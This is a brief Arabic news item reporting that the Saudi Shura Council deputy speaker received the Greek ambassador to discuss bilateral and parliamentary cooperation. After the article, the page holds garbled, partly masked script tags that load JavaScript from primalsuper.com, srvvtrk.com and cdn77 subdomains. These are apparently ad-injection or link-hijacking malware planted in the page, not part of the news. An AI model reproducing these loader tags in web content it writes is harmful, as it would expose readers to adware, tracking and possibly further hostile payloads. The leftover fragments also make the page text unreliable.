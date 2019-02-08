شكرا لقرائتكم خبر عن بحث التعاون البرلماني مع اليونان والان نبدء بالتفاصيل

استقبل نائب رئيس مجلس الشورى د.عبد الله المعطاني في مكتبه بمقر المجلس أمس سفير جمهورية اليونان لدى المملكة ايوانيس تاغيس. وأكد د.المعطاني عمق العلاقات الثنائية بين البلدين الصديقين التي تجسدت بالاتفاقيات التي وقعت بين قيادتي البلدين في الفترة الماضية، متطلعا لتعزيز التعاون في المجالات السياسية والاقتصادية والبرلمانية بينهما، وجرى خلال الاستقبال بحث عدد من الموضوعات ذات الاهتمام المشترك. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_194416884&key=1fd3b038f796d0b159&cv=1549548709&t=1549548709534" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_866349345&key=1fd3b038f796d0b159&cv=23594&t=1549548709535" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549548709538" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********



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